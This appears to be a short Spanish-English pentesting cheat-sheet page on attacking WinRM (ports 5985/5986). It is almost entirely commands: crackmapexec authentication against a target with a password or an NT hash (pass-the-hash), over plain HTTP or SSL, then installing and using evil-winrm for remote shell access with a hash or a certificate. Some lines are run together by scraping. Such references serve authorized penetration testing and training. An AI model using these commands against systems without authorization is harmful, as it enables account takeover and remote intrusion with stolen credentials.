Port 5985, 5986 - WinRM
Explotación
### Normal connection
crackmapexec winrm <TARGET-IP> -u '<USER>' -p '<PASSWD>' [-H '<NT-HASH>']
### With ssl
crackmapexec winrm <TARGET-IP> --ssl -u '<USER>' -p '<PASSWD>' [-H '<NT-HASH>'] --ignore-ssl-certgem install evilwinrm # Instalar evilwinrm
evil-winrm -i <HOST> -u <USER> -H <NT-HASH> # connection
evil-winrm -i <HOST> -c <CERT> -k <KEY> -S # ssl connectionLast updated